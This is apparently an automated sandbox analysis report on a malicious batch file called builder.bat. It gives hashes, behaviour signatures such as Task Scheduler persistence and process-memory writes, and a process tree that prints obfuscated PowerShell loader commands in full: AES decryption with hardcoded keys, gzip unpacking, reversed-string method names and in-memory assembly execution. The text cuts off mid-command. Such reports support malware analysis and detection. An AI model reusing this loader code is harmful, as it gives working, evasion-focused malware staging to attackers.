73a1aa605a3432db35d58efcb36255e044ff34cfa3244b15dea0410c1e371c8a

Analysis

max time kernel
52s
max time network
66s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
17/06/2023, 04:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

builder.bat
Size

13.8MB
MD5

4b57ad1265bcfcd60e287b1e10f38a72
SHA1

08e28f2c03bc37c2ac2e9640ab8239a97f917895
SHA256

73a1aa605a3432db35d58efcb36255e044ff34cfa3244b15dea0410c1e371c8a
SHA512

e2f518ee9caa0d57ccd2190ac9da5828118e41bfbf63f95e315bd7c60c770b321ecd1182bb3a980942524929ff8ac3590cede24bd7b410cb11419c2c369b26e6
SSDEEP

49152:00Ozb+j6dfA9onfe3dFQyIs3Bi4ZDE/nj1Rm/Y1xrL5esrKV4IeAzyl+KQvVbogi:a

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
4848	builder.bat.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe
File opened for modification	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	firefox.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4848	builder.bat.exe
4848	builder.bat.exe
4848	builder.bat.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4668	firefox.exe
Token: SeDebugPrivilege	4668	firefox.exe
Token: SeDebugPrivilege	4848	builder.bat.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
4668	firefox.exe
4668	firefox.exe
4668	firefox.exe
4668	firefox.exe
4668	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4668	firefox.exe
4668	firefox.exe
4668	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4668	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4296 wrote to memory of 1856	4296	cmd.exe	80
PID 4296 wrote to memory of 1856	4296	cmd.exe	80
PID 1856 wrote to memory of 1704	1856	net.exe	81
PID 1856 wrote to memory of 1704	1856	net.exe	81
PID 4640 wrote to memory of 4668	4640	firefox.exe	85
PID 4640 wrote to memory of 4668	4640	firefox.exe	85
PID 4640 wrote to memory of 4668	4640	firefox.exe	85
PID 4640 wrote to memory of 4668	4640	firefox.exe	85
PID 4640 wrote to memory of 4668	4640	firefox.exe	85
PID 4640 wrote to memory of 4668	4640	firefox.exe	85
PID 4640 wrote to memory of 4668	4640	firefox.exe	85
PID 4640 wrote to memory of 4668	4640	firefox.exe	85
PID 4640 wrote to memory of 4668	4640	firefox.exe	85
PID 4640 wrote to memory of 4668	4640	firefox.exe	85
PID 4640 wrote to memory of 4668	4640	firefox.exe	85
PID 4668 wrote to memory of 1464	4668	firefox.exe	86
PID 4668 wrote to memory of 1464	4668	firefox.exe	86
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87
PID 4668 wrote to memory of 3204	4668	firefox.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\builder.bat"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4296
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:1704
- C:\Users\Admin\AppData\Local\Temp\builder.bat.exe
  "builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function vvMtL($bFuwP){ $MtPKq=[System.Security.Cryptography.Aes]::Create(); $MtPKq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MtPKq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MtPKq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('48G3Dhkn9FsgrSBslRBLAr11R1l35k/tG7a6jPC/c9I='); $MtPKq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+q/ULe2SPMZ92f7Deubsdw=='); $imhRa=$MtPKq.CreateDecryptor(); $return_var=$imhRa.TransformFinalBlock($bFuwP, 0, $bFuwP.Length); $imhRa.Dispose(); $MtPKq.Dispose(); $return_var;}function IIiZy($bFuwP){ $mGqVw=New-Object System.IO.MemoryStream(,$bFuwP); $dokRX=New-Object System.IO.MemoryStream; $neKGK=New-Object System.IO.Compression.GZipStream($mGqVw, [IO.Compression.CompressionMode]::Decompress); $neKGK.CopyTo($dokRX); $neKGK.Dispose(); $mGqVw.Dispose(); $dokRX.Dispose(); $dokRX.ToArray();}function jVToZ($bFuwP,$PEEUt){ $SYqoD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$bFuwP); $acaPk=$SYqoD.EntryPoint; $acaPk.Invoke($null, $PEEUt);}$uveNX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\builder.bat').Split([Environment]::NewLine);foreach ($OorQg in $uveNX) { if ($OorQg.StartsWith(':: ')) { $cLwUF=$OorQg.Substring(3); break; }}$kFALv=[string[]]$cLwUF.Split('\');$xUNci=IIiZy (vvMtL ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($kFALv[0])));$JzQnC=IIiZy (vvMtL ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($kFALv[1])));jVToZ $JzQnC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));jVToZ $xUNci (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4848
- - C:\Windows\$sxr-powershell.exe
    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function OZQxi($WfENt){ $sQHHu=[System.Security.Cryptography.Aes]::Create(); $sQHHu.Mode=[System.Security.Cryptography.CipherMode]::CBC; $sQHHu.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $sQHHu.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8PkmcwCPZiNe3jX1I4nYNFeNLD7dwITmBVOg2gJk90='); $sQHHu.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MSUNr9IkD/bc/JbQ1z5LGg=='); $ycwOo=$sQHHu.('rotpyrceDetaerC'[-1..-15] -join '')(); $SajIO=$ycwOo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WfENt, 0, $WfENt.Length); $ycwOo.Dispose(); $sQHHu.Dispose(); $SajIO;}function hlJLn($WfENt){ $iMwyU=New-Object System.IO.MemoryStream(,$WfENt); $oYGLk=New-Object System.IO.MemoryStream; $kmlfx=New-Object System.IO.Compression.GZipStream($iMwyU, [IO.Compression.CompressionMode]::Decompress); $kmlfx.CopyTo($oYGLk); $kmlfx.Dispose(); $iMwyU.Dispose(); $oYGLk.Dispose(); $oYGLk.ToArray();}function JzRgA($WfENt,$FVFXx){ $DDLlS=[System.Reflection.Assembly]::Load([byte[]]$WfENt); $NnOhl=$DDLlS.EntryPoint; $NnOhl.Invoke($null, $FVFXx);}$sQHHu1 = New-Object System.Security.Cryptography.AesManaged;$sQHHu1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$sQHHu1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$sQHHu1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8PkmcwCPZiNe3jX1I4nYNFeNLD7dwITmBVOg2gJk90=');$sQHHu1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MSUNr9IkD/bc/JbQ1z5LGg==');$DfLwz = $sQHHu1.('rotpyrceDetaerC'[-1..-15] -join '')();$SsWnU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U30pf+erIjAchhiiNQJwBA==');$SsWnU = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SsWnU, 0, $SsWnU.Length);$SsWnU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SsWnU);$YCUkg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lV1xwxohXEd2mi1wNeQGUwGKfGww4eHjbWSLvk/WnN4=');$YCUkg = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YCUkg, 0, $YCUkg.Length);$YCUkg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YCUkg);$dqTMH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ssur7NefOXiP4obFbphPmA==');$dqTMH = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dqTMH, 0, $dqTMH.Length);$dqTMH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dqTMH);$IbzmS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6zbaXPyXREq5LYrMLA30lOX5sstq9VrWYMXU0NnGw9uC43Jry0dDS79fP784qvVoY8sPdwLtKCY483F0Fx3372wlcXHQcJiOXgWvSuwD46ONzXJ0IeCjHXlurHdftOePW7mshAevlXnCGxhmSPesJlcWhN77JtiQn2NPIQVjhfumdE+cBk83sVuUjHLRbwGGjWogIyzP3Q2SilcRXs02blJYo1A0/5H8uCzpsYH8TmdZRW8+kYL+j/yPQciCit8LKfQwpsug5sF6XuY3VSB62XkxO0qTZRMXqa8sH4TkaTpK4Ftwv4LVJnWu/bYDoY+8F7qbgI+bcXKFQsxQpOs35V1pC+DNt06gxheRaXjOH2Tb0gfIX+UA5YFZnsz5xEx1D4zsCKNtpXBEH5kwhc2q8X+oUc/6h8IEbPFQ6drfRBY=');$IbzmS = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IbzmS, 0, $IbzmS.Length);$IbzmS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IbzmS);$IvdeC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ih+4+GfS2qPCeYoORCRRjQ==');$IvdeC = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IvdeC, 0, $IvdeC.Length);$IvdeC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IvdeC);$lFMnD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BxrymMjaGOwgdeoQ5ILSog==');$lFMnD = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lFMnD, 0, $lFMnD.Length);$lFMnD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lFMnD);$MFPeH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+2xg7QQiHKFJkIHKOMV/g==');$MFPeH = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFPeH, 0, $MFPeH.Length);$MFPeH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFPeH);$AeWOQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IX8HlOlknrXmUKpoLSe27g==');$AeWOQ = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AeWOQ, 0, $AeWOQ.Length);$AeWOQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AeWOQ);$tktGq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HOG2NCZufiyQHPZWk/Zm/A==');$tktGq = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tktGq, 0, $tktGq.Length);$tktGq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tktGq);$SsWnU0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aMN81aB0CMpDAB+08odenA==');$SsWnU0 = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SsWnU0, 0, $SsWnU0.Length);$SsWnU0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SsWnU0);$SsWnU1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4SQxOBgQsHOMFCCJyIS3Hw==');$SsWnU1 = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SsWnU1, 0, $SsWnU1.Length);$SsWnU1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SsWnU1);$SsWnU2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ib9F56dexrRThprDC5A44g==');$SsWnU2 = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SsWnU2, 0, $SsWnU2.Length);$SsWnU2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SsWnU2);$SsWnU3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y93fWBvHbL+rotiXhDdX5A==');$SsWnU3 = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SsWnU3, 0, $SsWnU3.Length);$SsWnU3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SsWnU3);$DfLwz.Dispose();$sQHHu1.Dispose();if (@(get-process -ea silentlycontinue $SsWnU3).count -gt 1) {exit};$jmFyQ = [Microsoft.Win32.Registry]::$AeWOQ.$MFPeH($SsWnU).$lFMnD($YCUkg);$DhZmA=[string[]]$jmFyQ.Split('\');$IlhbP=hlJLn(OZQxi([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DhZmA[1])));JzRgA $IlhbP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$KXTbb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DhZmA[0]);$sQHHu = New-Object System.Security.Cryptography.AesManaged;$sQHHu.Mode = [System.Security.Cryptography.CipherMode]::CBC;$sQHHu.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$sQHHu.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8PkmcwCPZiNe3jX1I4nYNFeNLD7dwITmBVOg2gJk90=');$sQHHu.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MSUNr9IkD/bc/JbQ1z5LGg==');$ycwOo = $sQHHu.('rotpyrceDetaerC'[-1..-15] -join '')();$KXTbb = $ycwOo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KXTbb, 0, $KXTbb.Length);$ycwOo.Dispose();$sQHHu.Dispose();$iMwyU = New-Object System.IO.MemoryStream(, $KXTbb);$oYGLk = New-Object System.IO.MemoryStream;$kmlfx = New-Object System.IO.Compression.GZipStream($iMwyU, [IO.Compression.CompressionMode]::$SsWnU1);$kmlfx.$tktGq($oYGLk);$kmlfx.Dispose();$iMwyU.Dispose();$oYGLk.Dispose();$KXTbb = $oYGLk.ToArray();$DMkJU = $IbzmS | IEX;$DDLlS = $DMkJU::$SsWnU2($KXTbb);$NnOhl = $DDLlS.EntryPoint;$NnOhl.$SsWnU0($null, (, [string[]] ($dqTMH)))
    3⤵
    PID:6068
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6068).WaitForExit();[System.Threading.Thread]::Sleep(5000); function OZQxi($WfENt){ $sQHHu=[System.Security.Cryptography.Aes]::Create(); $sQHHu.Mode=[System.Security.Cryptography.CipherMode]::CBC; $sQHHu.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $sQHHu.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8PkmcwCPZiNe3jX1I4nYNFeNLD7dwITmBVOg2gJk90='); $sQHHu.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MSUNr9IkD/bc/JbQ1z5LGg=='); $ycwOo=$sQHHu.('rotpyrceDetaerC'[-1..-15] -join '')(); $SajIO=$ycwOo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WfENt, 0, $WfENt.Length); $ycwOo.Dispose(); $sQHHu.Dispose(); $SajIO;}function hlJLn($WfENt){ $iMwyU=New-Object System.IO.MemoryStream(,$WfENt); $oYGLk=New-Object System.IO.MemoryStream; $kmlfx=New-Object System.IO.Compression.GZipStream($iMwyU, [IO.Compression.CompressionMode]::Decompress); $kmlfx.CopyTo($oYGLk); $kmlfx.Dispose(); $iMwyU.Dispose(); $oYGLk.Dispose(); $oYGLk.ToArray();}function JzRgA($WfENt,$FVFXx){ $DDLlS=[System.Reflection.Assembly]::Load([byte[]]$WfENt); $NnOhl=$DDLlS.EntryPoint; $NnOhl.Invoke($null, $FVFXx);}$sQHHu1 = New-Object System.Security.Cryptography.AesManaged;$sQHHu1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$sQHHu1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$sQHHu1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8PkmcwCPZiNe3jX1I4nYNFeNLD7dwITmBVOg2gJk90=');$sQHHu1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MSUNr9IkD/bc/JbQ1z5LGg==');$DfLwz = $sQHHu1.('rotpyrceDetaerC'[-1..-15] -join '')();$SsWnU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U30pf+erIjAchhiiNQJwBA==');$SsWnU = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SsWnU, 0, $SsWnU.Length);$SsWnU = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SsWnU);$YCUkg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lV1xwxohXEd2mi1wNeQGUwGKfGww4eHjbWSLvk/WnN4=');$YCUkg = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YCUkg, 0, $YCUkg.Length);$YCUkg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YCUkg);$dqTMH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ssur7NefOXiP4obFbphPmA==');$dqTMH = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dqTMH, 0, $dqTMH.Length);$dqTMH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dqTMH);$IbzmS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6zbaXPyXREq5LYrMLA30lOX5sstq9VrWYMXU0NnGw9uC43Jry0dDS79fP784qvVoY8sPdwLtKCY483F0Fx3372wlcXHQcJiOXgWvSuwD46ONzXJ0IeCjHXlurHdftOePW7mshAevlXnCGxhmSPesJlcWhN77JtiQn2NPIQVjhfumdE+cBk83sVuUjHLRbwGGjWogIyzP3Q2SilcRXs02blJYo1A0/5H8uCzpsYH8TmdZRW8+kYL+j/yPQciCit8LKfQwpsug5sF6XuY3VSB62XkxO0qTZRMXqa8sH4TkaTpK4Ftwv4LVJnWu/bYDoY+8F7qbgI+bcXKFQsxQpOs35V1pC+DNt06gxheRaXjOH2Tb0gfIX+UA5YFZnsz5xEx1D4zsCKNtpXBEH5kwhc2q8X+oUc/6h8IEbPFQ6drfRBY=');$IbzmS = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IbzmS, 0, $IbzmS.Length);$IbzmS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IbzmS);$IvdeC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ih+4+GfS2qPCeYoORCRRjQ==');$IvdeC = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IvdeC, 0, $IvdeC.Length);$IvdeC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IvdeC);$lFMnD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BxrymMjaGOwgdeoQ5ILSog==');$lFMnD = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lFMnD, 0, $lFMnD.Length);$lFMnD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lFMnD);$MFPeH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+2xg7QQiHKFJkIHKOMV/g==');$MFPeH = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFPeH, 0, $MFPeH.Length);$MFPeH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFPeH);$AeWOQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IX8HlOlknrXmUKpoLSe27g==');$AeWOQ = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AeWOQ, 0, $AeWOQ.Length);$AeWOQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AeWOQ);$tktGq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HOG2NCZufiyQHPZWk/Zm/A==');$tktGq = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tktGq, 0, $tktGq.Length);$tktGq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tktGq);$SsWnU0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aMN81aB0CMpDAB+08odenA==');$SsWnU0 = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SsWnU0, 0, $SsWnU0.Length);$SsWnU0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SsWnU0);$SsWnU1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4SQxOBgQsHOMFCCJyIS3Hw==');$SsWnU1 = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SsWnU1, 0, $SsWnU1.Length);$SsWnU1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SsWnU1);$SsWnU2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ib9F56dexrRThprDC5A44g==');$SsWnU2 = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SsWnU2, 0, $SsWnU2.Length);$SsWnU2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SsWnU2);$SsWnU3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y93fWBvHbL+rotiXhDdX5A==');$SsWnU3 = $DfLwz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SsWnU3, 0, $SsWnU3.Length);$SsWnU3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SsWnU3);$DfLwz.Dispose();$sQHHu1.Dispose();if (@(get-process -ea silentlycontinue $SsWnU3).count -gt 1) {exit};$jmFyQ = [Microsoft.Win32.Registry]::$AeWOQ.$MFPeH($SsWnU).$lFMnD($YCUkg);$DhZmA=[string[]]$jmFyQ.Split('\');$IlhbP=hlJLn(OZQxi([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DhZmA[1])));JzRgA $IlhbP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$KXTbb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DhZmA[0]);$sQHHu = New-Object System.Security.Cryptography.AesManaged;$sQHHu.Mode = [System.Security.Cryptography.CipherMode]::CBC;$sQHHu.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$sQHHu.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8PkmcwCPZiNe3jX1I4nYNFeNLD7dwITmBVOg2gJk90=');$sQHHu.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MSUNr9IkD/bc/JbQ1z5LGg==');$ycwOo = $sQHHu.('rotpyrceDetaerC'[-1..-15] -join '')();$KXTbb = $ycwOo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KXTbb, 0, $KXTbb.Length);$ycwOo.Dispose();$sQHHu.Dispose();$iMwyU = New-Object System.IO.MemoryStream(, $KXTbb);$oYGLk = New-Object System.IO.MemoryStream;$kmlfx = New-Object System.IO.Compression.GZipStream($iMwyU, [IO.Compression.CompressionMode]::$SsWnU1);$kmlfx.$tktGq($oYGLk);$kmlfx.Dispose();$iMwyU.Dispose();$oYGLk.Dispose();$KXTbb = $oYGLk.ToArray();$DMkJU = $IbzmS | IEX;$DDLlS = $DMkJU::$SsWnU2($KXTbb);$NnOhl = $DDLlS.EntryPoint;$NnOhl.$SsWnU0($null, (, [string[]] 